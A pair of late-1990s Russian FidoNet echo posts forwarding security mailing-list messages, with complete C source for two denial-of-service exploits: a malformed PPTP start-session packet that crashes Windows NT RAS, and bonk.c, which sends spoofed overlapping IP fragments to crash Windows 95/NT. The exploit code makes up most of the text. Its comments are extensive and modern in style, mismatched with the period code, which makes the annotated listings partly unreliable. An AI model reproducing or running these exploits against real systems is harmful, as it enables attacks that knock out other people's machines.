_ RU.NETHACK (2:5077/15.22) _______________________________________ RU.NETHACK _
From : Ricky Lyte 2:5030/48.58 06 Dec 97 13:10:02
Subj : DOS (Windoze NT RAS PPTP exploit)
________________________________________________________________________________
AN> Кто расскажет, что за тип атаки такой Denial of Service?
Бомбардировка сервера-жертвы, пока она или коньки не отбросит, или перестанет
реагировать на новые соединения.
Небольшой пример:
Date: Wed, 26 Nov 1997 11:48:13 -0600
From: Kevin Wormington <kworm@SOFNET.COM>
Subject: Potential DOS in Windows NT RAS PPTP
Hi, this is my first posting so please excuse the style. Please forgive me
if this has been posted before, but I have not seen it. Also, I am unable
to test it with different hotfixes, etc.
I discovered that NT 4.0 w/SP3 and RAS PPTP is vulnerable to a DOS causing
core dump. I have been working with point to point tunnelling protocol and
discovered (by accident) that if you send a pptp start session request with
an invalid packet length in the pptp packet header that it will crash an NT
box.
Here is a very crude code fragment that will exploit this behaviour:
/*
* Sample Windoze NT RAS PPTP exploit
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
/* PPTP control-connection constants and wire structures used by
 * pptp_start_session() below.  The two byte offsets assume the packet
 * header occupies 8 bytes, i.e. that u_long is 4 bytes wide; on LP64
 * targets u_long is 8 bytes and neither the struct sizes nor these
 * offsets match the layout they are meant to describe. */
#define PPTP_MAGIC_COOKIE 0x1a2b3c4d
#define PPTP_CONTROL_HEADER_OFFSET 8 /* where PptpControlHeader is copied into the packet */
#define PPTP_REQUEST_OFFSET 12 /* where the start-session request body is copied */
/* PptpPacketHeader.packetType values; only PPTP_CONTROL_PACKET is sent here. */
typedef enum {
PPTP_CONTROL_PACKET = 1,
PPTP_MGMT_PACKET} PptpPacketType;
/* PptpControlHeader.messageType values; only PPTP_START_SESSION_REQUEST is sent here. */
typedef enum {
PPTP_START_SESSION_REQUEST = 1,
PPTP_START_SESSION_REPLY,
PPTP_STOP_SESSION_REQUEST,
PPTP_STOP_SESSION_REPLY,
PPTP_ECHO_REQUEST,
PPTP_ECHO_REPLY,
PPTP_OUT_CALL_REQUEST,
PPTP_OUT_CALL_REPLY,
PPTP_IN_CALL_REQUEST,
PPTP_IN_CALL_REPLY,
PPTP_IN_CALL_CONNECTED,
PPTP_CALL_CLEAR_REQUEST,
PPTP_CALL_DISCONNECT_NOTIFY,
PPTP_WAN_ERROR_NOTIFY,
PPTP_SET_LINK_INFO,
PPTP_NUMBER_OF_CONTROL_MESSAGES} PptpControlMessageType;
/* Fixed header at the front of every control packet.  All fields are
 * stored in network byte order (see the htons()/htonl() calls below).
 * The advisory above describes packetLength as the length of the whole
 * packet; a receiver must not act on it without checking it against the
 * bytes actually read and the valid size range for packetType. */
typedef struct {
u_short packetLength;
u_short packetType;
u_long magicCookie;} PptpPacketHeader; /* magicCookie is always PPTP_MAGIC_COOKIE here */
/* Control-message header that follows PptpPacketHeader. */
typedef struct {
u_short messageType;
u_short reserved;
} PptpControlHeader;
/* Echo request/reply bodies and result codes: declared but not referenced
 * anywhere in this listing. */
typedef struct {
u_long identNumber;} PptpEchoRequest;
typedef enum {
PPTP_ECHO_OK = 1,
PPTP_ECHO_GENERAL_ERROR} PptpEchoReplyResultCode;
typedef struct {
u_long identNumber;
u_char resultCode;
u_char generalErrorCode;
u_short reserved;} PptpEchoReply;
/* Bit flags for framingCapability / bearerCapability; only the ASYNC and
 * ANALOG bits are set by pptp_start_session(). */
#define PPTP_FRAME_CAP_ASYNC 0x00000001L
#define PPTP_FRAME_CAP_SYNC 0x00000002L
#define PPTP_BEARER_CAP_ANALOG 0x00000001L
#define PPTP_BEARER_CAP_DIGITAL 0x00000002L
/* Body of a start-session request.  hostName and vendorString are fixed
 * 64-byte fields; pptp_start_session() zero-fills them before writing. */
typedef struct {
u_short protocolVersion;
u_char reserved1;
u_char reserved2;
u_long framingCapability;
u_long bearerCapability;
u_short maxChannels;
u_short firmwareRevision;
char hostName[64];
char vendorString[64];} PptpStartSessionRequest;
/* Builds and sends one start-session request on an already connected TCP
 * socket; defined after main().  Always returns 0. */
int pptp_start_session (int);
/* Entry point: resolves argv[1], opens a TCP connection to its "pptp"
 * service and hands the socket to pptp_start_session().
 * Exits with status 1 on any setup failure, 0 otherwise. */
int main(int argc, char **argv)
{
/* i, s and offset are declared but never assigned; s is passed to close()
 * below while still uninitialized (the intended descriptor is pptp_sock). */
int pptp_sock, i, s, offset;
/* src_ip, dst_ip, addr, ctl_mask and buf are unused in this function. */
u_long src_ip, dst_ip = 0;
struct in_addr addr;
struct sockaddr_in sn;
struct hostent *hp;
struct servent *sp;
fd_set ctl_mask;
char buf[2048];
if((pptp_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror("tcp socket");
exit(1);
}
/* Port is taken from the services database rather than hard-coded. */
sp = getservbyname("pptp", "tcp"); /* port 1723 */
if (!sp)
{
fprintf(stderr, "pptp: tcp/pptp: unknown service\n");
exit(1);
}
/* argc is never checked: running without an argument dereferences a NULL
 * argv[1] here. */
hp = gethostbyname(argv[1]);
if (!hp) { fprintf (stderr, "Address no good.\n"); exit(1); }
memset(&sn, 0, sizeof(sn));
sn.sin_port = sp->s_port;
sn.sin_family = hp->h_addrtype;
/* Clamps the address length so the memcpy cannot overrun sin_addr, but
 * does so by writing into the resolver-owned hostent rather than a local. */
if (hp->h_length > (int)sizeof(sn.sin_addr))
{
hp->h_length = sizeof(sn.sin_addr);
}
memcpy(&sn.sin_addr, hp->h_addr, hp->h_length);
if (connect(pptp_sock, (struct sockaddr *)&sn, sizeof(sn)) < 0)
{
perror("pptp: can't connect");
close(s); /* closes the uninitialized s, not pptp_sock */
exit(1);
}
/* Return value (always 0, see below) is ignored. */
pptp_start_session(pptp_sock);
fprintf(stderr, "Done\n");
close(pptp_sock);
return (0);
}
/* Assembles a single PPTP start-session request in a local buffer and
 * writes it to the connected socket sock.
 * The packet header advertises a length of 20 while 156 bytes are sent
 * (8-byte packet header + 4-byte control header + 144-byte request, with
 * 4-byte u_long); that disagreement between the advertised length and the
 * bytes on the wire is the malformed input the advisory above describes.
 * A receiver must bound every read by the bytes actually received and
 * reject a length outside the valid range for the message type before
 * using it.  Always returns 0; the result of send() is not checked. */
int pptp_start_session (int sock)
{
PptpPacketHeader packetheader;
PptpControlHeader controlheader;
PptpStartSessionRequest sessionrequest;
char packet[200];
int offset; /* unused */
packetheader.packetLength = htons (20); /* advertised length; does not match the 156 bytes sent below */
packetheader.packetType = htons(PPTP_CONTROL_PACKET);
packetheader.magicCookie = htonl(PPTP_MAGIC_COOKIE);
controlheader.messageType = htons(PPTP_START_SESSION_REQUEST);
controlheader.reserved = 0;
sessionrequest.protocolVersion = htons(1);
sessionrequest.reserved1 = 0;
sessionrequest.reserved2 = 0;
sessionrequest.framingCapability = htonl(PPTP_FRAME_CAP_ASYNC);
sessionrequest.bearerCapability = htonl(PPTP_BEARER_CAP_ANALOG);
sessionrequest.maxChannels = htons(32);
sessionrequest.firmwareRevision = htons(1);
/* Both 64-byte string fields are zero-filled first, so the fixed literals
 * written by sprintf() are NUL-terminated and padded. */
memset(&sessionrequest.hostName, 0, sizeof (sessionrequest.hostName));
sprintf (sessionrequest.hostName, "%s", "mypc.anywhere.com");
memset(&sessionrequest.vendorString, 0, sizeof
(sessionrequest.vendorString));
sprintf (sessionrequest.vendorString, "%s", "Any Vendor");
/* Lay the three structs out back to back at the fixed offsets; the copies
 * use the in-memory struct layout, so any padding is sent as-is. */
memset(&packet, 0, sizeof(packet));
memcpy(&packet, &packetheader, sizeof(packetheader));
memcpy(&packet[PPTP_CONTROL_HEADER_OFFSET], &controlheader,
sizeof(controlheader));
memcpy(&packet[PPTP_REQUEST_OFFSET], &sessionrequest,
sizeof(sessionrequest));
send (sock, &packet, 156, 0); /* return value not checked */
return (0);
}
AN> Или вот еще вопрос: можно ли как-нибудь обойти shadowing?
Об этом в следующей мессаге.
Team Porno-Grafica
--- 1984! * Origin: Welcome to the world of Emotional Degradation! (2:5030/48.58)
_ Не ходи! Засекурят (2:5077/15.22) ______________________________ RU.SECURITY _
From : Stas Filshtinskiy 2:461/33.47 10 Jan 98 09:57:20
Subj : new DOS attack
________________________________________________________________________________
Приветствую тебя, All!
Вот почитайте ... опять ...
-----Original Message-----
From: Jiva DeVoe [SMTP:jiva@devware.com]
Sent: Thursday, January 08, 1998 7:53 PM
To: ntsecurity@iss.net
Subject: [NTSEC] New DOS exploit for NT and Win95 (CONFIRMED)
---------------------------------------------------------------------------
This is just an FYI. I have confirmed and reproduced a new Denial of
Service exploit for Windows NT and Windows95. Under Windows NT this
exploit causes a proverbial BSOD, under Windows95, this causes an
exception in IFSMGR.VXD.
This exploit has been reported to Microsoft!
Details
Without putting out a blueprint of how to cause this: it is a
modified teardrop attack. (NOTE: This DOES affect machines patched
against teardrop) It utilizes UDP packets with altered headers. I have
also provided Microsoft with source code to this exploit.
Temporary Workaround
Any workaround that would have been implemented against teardrop should
work against this issue. By default, the UDP packets used in this
exploit are aimed at very high port numbers. So perhaps by blocking UDP
packets destined for high port numbers, you might be able to prevent
this attack. However, since it can be aimed at any port, a clever user
could get around filters such as this. I'd be happy to talk to anyone
about other alternatives for working around this issue.
Please feel free to repost this to NTBUGTRAQ (I'm not on that list) or
wherever else you choose.
-------------
Jiva DeVoe
MCSE
Devware Systems
jiva@devware.com
И еще
-----Original Message-----
From: Ken Williams [SMTP:jkwilli2@unity.ncsu.edu]
Sent: Friday, January 09, 1998 8:14 AM
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM; ntsecurity@iss.net
Subject: [NTSEC] bonk.c - modified teardrop attack that affects patched
NT and Win95
---------------------------------------------------------------------------
here is the forwarded source code for the modified teardrop attack that
*supposedly* affects all patched NT and Win95 boxes.
Ken
/<--------------{ TATTOOMAN -aka- rute }-------------->\
NCSU Computer Science Member of E.H.A.P.
jkwilli2@unity.ncsu.edu http://www.hackers.com/ehap/
UNIX ICQ UIN# 4231260 ehap@hackers.com
FTP Site: ftp://152.7.11.38/pub/personal/tattooman/
WWW 2: http://www4.ncsu.edu/~jkwilli2/
\<---------{ http://152.7.11.38/~tattooman/ }--------->/
---------- Forwarded message ----------
Date: 8 Jan 1998 20:52:46 -0000
From: announce-outgoing@rootshell.com
Cc: recipient list not shown: ;
Subject: [rootshell] Security Bulletin #5
www.rootshell.com
Security Bulletin #5
January 8th, 1998
[ http://www.rootshell.com/ ]
----------------------------------------------------------------------
----------------------------------------------------------------------
01. bonk.c - Modified teardrop attack.
--------------------------------------
These network DoS attacks sure are trendy now ...
/*
==bendi - 1998==
bonk.c - 5/01/1998
Based On: teardrop.c by route|daemon9 & klepto
Crashes *patched* win95/(NT?) machines.
Basically, we set the frag offset > header length (teardrop
reversed). There are many theories as to why this works,
however i do not have the resources to perform extensive testing.
I make no warranties. Use this code at your own risk.
Rip it if you like, i've had my fun.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <arpa/inet.h>
#define FRG_CONST 0x3 /* sizes and places the second fragment, see fondle() */
#define PADDING 0x1c /* 28 bytes of zeroed UDP payload in the first fragment */
/* One IP + UDP datagram image, filled by fondle() and written through a
 * raw socket with IP_HDRINCL (see main()).  The single global instance
 * pkt is zeroed and rebuilt on every call. */
struct udp_pkt
{
struct iphdr ip;
struct udphdr udp;
char data[PADDING];
} pkt;
/* Header sizes come from the kernel structs; datalen is declared but never
 * referenced in this listing.  spf_sck is the raw socket opened in main()
 * and closed by quit(). */
int udplen=sizeof(struct udphdr),
iplen=sizeof(struct iphdr),
datalen=100,
psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
spf_sck; /* Socket */
/* Prints the command-line synopsis to stderr and terminates the process.
 * The exit status is 0, as in the original, even though this is reached
 * only on a usage error. */
void usage(void)
{
    static const char synopsis[] =
        "Usage: ./bonk <src_addr> <dst_addr> [num]\n";
    fputs(synopsis, stderr);
    exit(0);
}
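/* Resolves host_name with gethostbyname() and returns its first address
 * as a network-byte-order value in the low bytes of a u_long.
 * Returns 0 when host_name is NULL, resolution fails, or the resolver
 * returns no address; note 0 is also what "0.0.0.0" resolves to.
 * The copy is bounded by sizeof ip_bytes: h_length is resolver-supplied
 * and the original copied it unchecked into a 4-byte-assumed static. */
u_long host_to_ip(char *host_name)
{
    u_long ip_bytes = 0;
    struct hostent *res;
    size_t len;

    if (host_name == NULL) {
        return (0);
    }
    res = gethostbyname(host_name);
    if (res == NULL || res->h_addr_list == NULL || res->h_addr_list[0] == NULL
        || res->h_length <= 0) {
        return (0);
    }
    /* Never copy more than the destination holds, whatever the resolver says. */
    len = (size_t)res->h_length;
    if (len > sizeof ip_bytes) {
        len = sizeof ip_bytes;
    }
    memcpy(&ip_bytes, res->h_addr_list[0], len);
    return (ip_bytes);
}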
/* Fatal-error exit: reports reason and the current errno through
 * perror(), closes the global raw socket spf_sck and terminates with
 * status -1 (seen as 255 by most shells).  Never returns. */
void quit(char *reason)
{
    /* perror() first, so close() cannot disturb the errno being reported. */
    perror(reason);
    (void)close(spf_sck);
    exit(-1);
}
/* Writes one UDP datagram split into two IP fragments to dst_addr through
 * the raw socket sck (the caller sets IP_HDRINCL, so the IP header built
 * here goes on the wire as-is).
 * The first fragment has offset 0 with MF set and carries the 8-byte UDP
 * header plus PADDING bytes.  The second is sent with fragment offset
 * FRG_CONST + 1 (4, i.e. byte 32) and an IP total length of
 * iplen + FRG_CONST (23 with the 20-byte header ihl = 5 implies), which
 * is one byte less than the 24 bytes handed to sendto() and lands inside
 * the range the first fragment already covered.  That is the
 * "offset > header length" condition the file comment refers to; a
 * reassembly implementation must validate each fragment's offset and
 * length against what it has already accepted and discard fragments
 * that do not fit, rather than trusting the header values.
 * Returns the result of the second sendto() (byte count or -1); the first
 * sendto()'s result is overwritten without being checked. */
int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
int dst_prt)
{
int bs;
struct sockaddr_in to; /* only family, port and address are set below */
memset(&pkt, 0, psize);
/* Fill in ip header */
pkt.ip.version = 4;
pkt.ip.ihl = 5; /* 20-byte header, no options */
pkt.ip.tot_len = htons(udplen + iplen + PADDING);
pkt.ip.id = htons(0x455); /* fixed IP id shared by both fragments */
pkt.ip.ttl = 255;
pkt.ip.protocol = IP_UDP;
pkt.ip.saddr = src_addr; /* caller-supplied; not the socket's own address */
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons(0x2000); /* more to come */
pkt.udp.source = htons(src_prt); /* udp header */
pkt.udp.dest = htons(dst_prt);
pkt.udp.len = htons(8 + PADDING);
/* send 1st frag */
to.sin_family = AF_INET;
to.sin_port = src_prt; /* not byte-swapped; presumably unused on a raw socket with IP_HDRINCL — verify */
to.sin_addr.s_addr = dst_addr;
bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));
/* Second fragment: same id, MF clear, offset FRG_CONST + 1, and a total
 * length smaller than the byte count passed to sendto() below. */
pkt.ip.frag_off = htons(FRG_CONST + 1); /* shinanigan */
pkt.ip.tot_len = htons(iplen + FRG_CONST);
/* 2nd frag */
bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
(struct sockaddr *) &to, sizeof(struct sockaddr));
return bs;
}
/* Entry point: ./bonk <src_addr> <dst_addr> [num].  Resolves both hosts,
 * opens a raw IP socket with IP_HDRINCL and calls fondle() num times
 * (default 10) with a 10 ms pause between calls.
 * "void main" is non-standard; the function should return int.
 * atoi(), usleep(), exit() and close() are used without the headers that
 * declare them being included above (implicit declarations). */
void main(int argc, char *argv[])
{
u_long src_addr,
dst_addr;
/* bs doubles as the IP_HDRINCL option value (1) for setsockopt(). */
int i,
src_prt=53,
dst_prt=53,
bs = 1,
pkt_count = 10; /* Default amount */
if (argc < 3)
usage();
/* atoi() reports no errors: a non-numeric or negative count silently
 * becomes 0 or a negative value, which skips the loop entirely. */
if (argc == 4)
pkt_count = atoi(argv[3]); /* 10 does the trick */
/* Resolve hostnames */
src_addr = host_to_ip(argv[1]);
if (!src_addr)
quit("bad source host");
dst_addr = host_to_ip(argv[2]);
if (!dst_addr)
quit("bad target host");
spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
/* socket() returns -1 on failure and 0 is a valid descriptor, so this
 * test never detects the failure; it should be `if (spf_sck < 0)`. */
if (!spf_sck)
quit("socket()");
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
sizeof(bs)) < 0)
quit("IP_HDRINCL");
for (i = 0; i < pkt_count; ++i)
{
fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt); /* result ignored */
usleep(10000);
}
/* spf_sck is never closed on the success path; the process exit reclaims it. */
printf("Done.\n");
}
----------------------------------------------------------------------
----------------------------------------------------------------------
С уважением,
Stas
Sat Jan 10 1998 09:58.
--- GEcho 1.20/Pro * Origin: 4F @ Home ! (2:461/33.47)